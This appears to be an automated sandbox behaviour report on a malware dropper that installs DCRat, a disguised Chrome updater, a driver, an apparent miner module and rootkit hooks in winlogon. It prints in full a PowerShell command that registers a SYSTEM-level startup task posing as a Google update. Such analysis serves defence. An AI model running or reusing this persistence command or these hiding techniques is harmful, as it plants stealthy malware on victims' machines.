Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\launcher.exe.bin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: launcher.exe.bin.exe

Static file information: File size 7539712 > 1048576

Source: launcher.exe.bin.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x72ee00

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCRatBuild.exe, 00000003.00000000.2383732416.00000000000A3000.00000002.00000001.01000000.00000006.sdmp, DCRatBuild.exe, 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launcher.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384395400.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000006.00000000.2385077688.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp, launcher.exe, 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launcher.pdb00 source: launcher.exe.bin.exe, 00000000.00000003.2384395400.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000006.00000000.2385077688.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp, launcher.exe, 00000006.00000002.3730454163.00007FF77E0A3000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\EtoShinya\source\repos\shika\x64\Stable\launche`r.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \launche`r.pdb source: launcher.exe.bin.exe, 00000000.00000003.2384062498.0000000000E29000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\AppData\Local\Temp\hs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

File created: C:\fontdriversavescrt\__tmp_rar_sfx_access_check_6030687

Jump to behavior

Source: launcher.exe.bin.exe	Static PE information: real checksum: 0x0 should be: 0x73b90c
Source: ComComponentDriverInto.exe.3.dr	Static PE information: real checksum: 0x0 should be: 0x1fc38e
Source: hs.exe.0.dr	Static PE information: real checksum: 0x5c4725 should be: 0x5c64a2
Source: DCRatBuild.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x1dd800
Source: updater.exe.2.dr	Static PE information: real checksum: 0x5c4725 should be: 0x5c64a2
Source: ylbujkauzmzd.tmp.43.dr	Static PE information: real checksum: 0x0 should be: 0x554c2a
Source: ylbujkauzmzd.tmp.2.dr	Static PE information: real checksum: 0x0 should be: 0x342e8
Source: launcher.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4d009

Source: hs.exe.0.dr	Static PE information: section name: .xdata
Source: DCRatBuild.exe.0.dr	Static PE information: section name: .didat
Source: updater.exe.2.dr	Static PE information: section name: .xdata
Source: ylbujkauzmzd.tmp.43.dr	Static PE information: section name: _RANDOMX
Source: ylbujkauzmzd.tmp.43.dr	Static PE information: section name: _TEXT_CN
Source: ylbujkauzmzd.tmp.43.dr	Static PE information: section name: _TEXT_CN
Source: ylbujkauzmzd.tmp.43.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008F640 push ecx; ret	3_2_0008F653
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_0008EB78 push eax; ret	3_2_0008EB96
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF16484FD push rcx; retf 003Fh	6_2_000001EDF16484FE
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF16422B8 push rdx; retf	6_2_000001EDF16422B9
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_000001EDF16794FD push rcx; retf 003Fh	6_2_000001EDF16794FE
Source: C:\Users\user\AppData\Local\Temp\launcher.exe	Code function: 6_2_00007FF77E08C660 push rdi; retn 0000h	6_2_00007FF77E08C669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFE16647517 push ebx; iretd	21_2_00007FFE1664753A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FFE16710BF1 push eax; ret	21_2_00007FFE16710BF2
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8622B8 push rdx; retf	24_2_000001881F8622B9
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8684FD push rcx; retf 003Fh	24_2_000001881F8684FE
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8994FD push rcx; retf 003Fh	24_2_000001881F8994FE
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8C22B8 push rdx; retf	24_2_000001881F8C22B9
Source: C:\Windows\System32\winlogon.exe	Code function: 24_2_000001881F8C84FD push rcx; retf 003Fh	24_2_000001881F8C84FE
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7D22B8 push rdx; retf	28_2_00000264CD7D22B9
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CD7D84FD push rcx; retf 003Fh	28_2_00000264CD7D84FE
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDE794FD push rcx; retf 003Fh	28_2_00000264CDE794FE
Source: C:\Windows\System32\lsass.exe	Code function: 28_2_00000264CDED94FD push rcx; retf 003Fh	28_2_00000264CDED94FE
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42E22B8 push rdx; retf	30_2_000001BEC42E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC42E84FD push rcx; retf 003Fh	30_2_000001BEC42E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_000001BEC43194FD push rcx; retf 003Fh	30_2_000001BEC43194FE
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37D22B8 push rdx; retf	31_2_0000023BF37D22B9
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF37D84FD push rcx; retf 003Fh	31_2_0000023BF37D84FE
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF38094FD push rcx; retf 003Fh	31_2_0000023BF38094FE
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A722B8 push rdx; retf	31_2_0000023BF3A722B9
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_0000023BF3A784FD push rcx; retf 003Fh	31_2_0000023BF3A784FE
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDE84FD push rcx; retf 003Fh	32_2_000001935CDE84FE
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935CDE22B8 push rdx; retf	32_2_000001935CDE22B9
Source: C:\Windows\System32\svchost.exe	Code function: 32_2_000001935D5494FD push rcx; retf 003Fh	32_2_000001935D5494FE
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55A84FD push rcx; retf 003Fh	34_2_000001B1E55A84FE
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55A22B8 push rdx; retf	34_2_000001B1E55A22B9
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_000001B1E55D94FD push rcx; retf 003Fh	34_2_000001B1E55D94FE

Source: ComComponentDriverInto.exe.3.dr

Static PE information: section name: .text entropy: 7.576095152790174

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Users\user\AppData\Local\Temp\hs.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\launcher.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\ylbujkauzmzd.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\hs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	File created: C:\fontdriversavescrt\ComComponentDriverInto.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hs.exe	File created: C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\launcher.exe.bin.exe	File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\Temp\ylbujkauzmzd.tmp

Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\explorere

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Temp\hs.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YLBUJKAUZMZD.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\YLBUJKAUZMZD.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\YLBUJKAUZMZD.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\YLBUJKAUZMZD.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Source: C:\Users\user\Desktop\launcher.exe.bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
